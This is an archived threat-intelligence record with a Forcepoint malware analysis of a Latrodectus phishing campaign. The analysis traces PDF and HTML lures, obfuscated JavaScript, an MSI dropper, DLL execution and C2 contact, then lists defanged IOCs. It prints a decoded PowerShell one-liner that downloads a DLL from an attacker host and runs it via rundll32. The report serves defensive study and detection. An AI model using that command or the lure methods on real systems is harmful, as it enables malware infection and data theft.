{
	"id": "9ec0af3f-3570-40e4-9989-980b4c3b79ec",
	"created_at": "2026-04-06T00:10:10.84132Z",
	"updated_at": "2026-04-10T03:23:51.85617Z",
	"deleted_at": null,
	"sha1_hash": "ba1cb63d661f23808c46df7316baa400367b7782",
	"title": "Inside the Latrodectus Malware Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 850681,
	"plain_text": "Inside the Latrodectus Malware Campaign\r\nPublished: 2024-10-18 · Archived: 2026-04-05 13:36:09 UTC\r\nThis report offers an in-depth analysis of recent Latrodectus campaign activity uncovered by our X-Labs research team. One of the principal dissemination techniques for Latrodectus involves phishing emails, leveraging infrastructure like that of IcedID.\r\nLatrodectus primarily targets the financial, automotive and healthcare business sectors. By compromising email accounts and distributing malicious attachments, it propagates across a broader network of potential targets.\r\nCurrently, threat actors are increasingly adopting Latrodectus, utilizing prevalent attachment formats such as HTML and PDF. It is typically engineered for stealth and persistence, complicating detection and eradication efforts. This can lead to the exfiltration of personal data, financial losses due to fraud or extortion, and the compromise of sensitive information.\r\nThe Latrodectus campaign initiates with attacks originating from a compromised email that appears to contain critical DocuSign documents. Users are encouraged to access the document via the provided link. When the link is clicked, users are redirected to a malicious URL, resulting in the inadvertent download of the next-stage payload.\r\nFig. 1 - Attack chain\r\nhttps://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign\r\nPage 1 of 8\n\nFig. 2 - Initial access PDF\r\nFig. 3 - PDF suspicious embedded URL\r\nThe PDF contains a compromised domain with a redirection:\r\n“hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW”\r\nIt redirects through a shortener URL to another suspicious domain, “hxxps://digitalpinnaclepub[.]com/?3”, and finally redirects to a “storage.googleapis.com” project to download malicious obfuscated JavaScript: “hxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js”\r\nObfuscated JavaScript Analysis:\r\nThe JavaScript contains a lot of junk messages in “//” comments, which increases obfuscation and file size. The actual malicious JavaScript code is commented out with “////”.\r\nFig. 4 - Obfuscated JavaScript payload\r\nAfter removing the junk messages, it shows obfuscated JavaScript string manipulation using replace and join functions. Replacing “////” with a space (“ ”) reveals the actual malicious code.\r\nFig. 5 - Deobfuscated JavaScript string manipulation functions\r\nAfter deobfuscation, it creates ActiveXObject(\"WindowsInstaller.Installer\") and downloads a .msi installer file. See Fig. 6 below:\r\nFig. 6 - Deobfuscated JavaScript code downloads MSI file\r\nMSI Analysis:\r\nThe MSI file is executed via JavaScript and drops a malicious 64-bit .dll file in %appdata%. It also executes the .dll with rundll32.exe, passing the export function as a parameter.\r\nFig. 7 - MSI file\r\nThe dropped .dll contains the export function “GetDeepDVCState”, and the MSI executes this .dll with the parameter “/DontWait C:/Windows/SysWOW64/rundll32.exe C:\\Users\\Admin\\AppData\\Roaming\\vierm_soft_x64.dll, GetDeepDVCState”\r\nDLL Analysis:\r\nThe DLL is a Microsoft Visual C++ 64-bit binary with fake NVIDIA version information:\r\nFig. 8 - DLL version info\r\nUpon analysis, this DLL unpacks another stage DLL payload in memory:\r\nFig. 9 - DLL version info.\r\nThe unpacked 64-bit DLL binary connects to a malicious C2 server on the unusual port 8041:\r\nGreshunka[.]com:8041/bazar.php\r\nInitial Access via HTML\r\nThe phishing HTML page looks like a Word document pop-up to the user. Clicking on the button executes malicious JavaScript code embedded in the HTML. See Fig. 10 below:\r\nFig. 10 - HTML attachment\r\nIt contains pop-up warning messages stored in reversed form:\r\n“document.getElementById(\"prompt\").innerHTML = ll('.nottub \u003eb/\u003c\"noituloS\"\u003eb\u003c eht gnisu woleb snoitcurtsni eht wollof esaelP .tnemucod siht fo yalpsid enilffo tcerroc troppus ton seod resworb ruoY');”\r\nReversed message:\r\nYour browser does not support correct offline display of this document. Please follow the instructions below using the \"Solution\" button.\r\nIt also uses a different string encoding, window.atob(), and obfuscation functions such as s.split(\"\").reverse().join(\"\");\r\nFig. 11 - Suspicious code in HTML\r\nDecoded base64 code:\r\ncmd /c start /min powershell $path='%appdata%\\witwin_st_x64.dll';iwr hxxp://gertioma[.]top/o.jpg -outfile $path;\r\nstart-process rundll32 $path,NxReleasePMap8==\r\nThis shows the threat actors using HTML to launch PowerShell, which downloads the DLL payload directly without an MSI, executes it with rundll32.exe and connects to the C2. We have observed a few campaigns with an HTML attachment in compromised emails.\r\nConclusion:\r\nThreat actors continue to use older emails to target users via suspicious PDF or HTML attachments. They use a redirection method with URL shorteners and host malicious payloads on well-known storage[.]googleapis[.]com hosting projects. The obfuscated JavaScript then downloads an MSI, which uses rundll32.exe to execute the 64-bit DLL.\r\nThis campaign mixes the old with the new. Latrodectus leverages older infrastructure, combined with a new, innovative malware payload distribution method, against the financial, automotive and business sectors.\r\nProtection statement:\r\nForcepoint customers are protected against this threat at the following stages of attack:\r\nStage 2 (Lure) – Malicious PDF and HTML attachments associated with these attacks are identified and blocked.\r\nStage 3 (Redirect) – Blocked redirectional shortened URLs and compromised domains.\r\nStage 5 (Dropper File) – The dropper files are added to the Forcepoint malicious database and are blocked.\r\nStage 6 (Call Home) – Blocked C2 credentials.\r\nIOCs\r\nInitial Stage URLs:\r\nhxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW\r\nhxxps://cutt[.]ly/seU8MT6t#_fZ0NmW\r\nhxxps://digitalpinnaclepub[.]com/?3\r\nhxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js\r\nhxxp://194[.]54[.]156[.]91/dsa.msi\r\nhxxp://gertioma[.]top/o.jpg\r\nC2s:\r\ntiguanin[.]com\r\ngreshunka[.]com\r\nbazarunet[.]com\r\nmazinom[.]com\r\nleroboy[.]com\r\nkrinzhodom[.]com\r\nklemanzino[.]net\r\nrilomenifis[.]com\r\nisomicrotich[.]com\r\nHashes:\r\n35A990C3BE798108C9D12A47F4A028468EA6095B\r\n9361621490915EBB919B79C6101874F03E4E51BC\r\n71E99A21FFA29E1E391811F5A3D04DCBB9CF0949\r\n570c4ab78cf4bb22b78aac215a4a79189d4fa9ed\r\n62e23500cc5368e37be47371342784f72e481647\r\n881993bcb37aa9504249271b7559addc0c633f09\r\n7474873629399ee5fdd984c99b705e0490ab8707\r\nSource: https://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign"
	],
	"report_names": [
		"inside-latrodectus-malware-phishing-campaign"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434210,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ba1cb63d661f23808c46df7316baa400367b7782.pdf",
		"text": "https://archive.orkl.eu/ba1cb63d661f23808c46df7316baa400367b7782.txt",
		"img": "https://archive.orkl.eu/ba1cb63d661f23808c46df7316baa400367b7782.jpg"
	}
}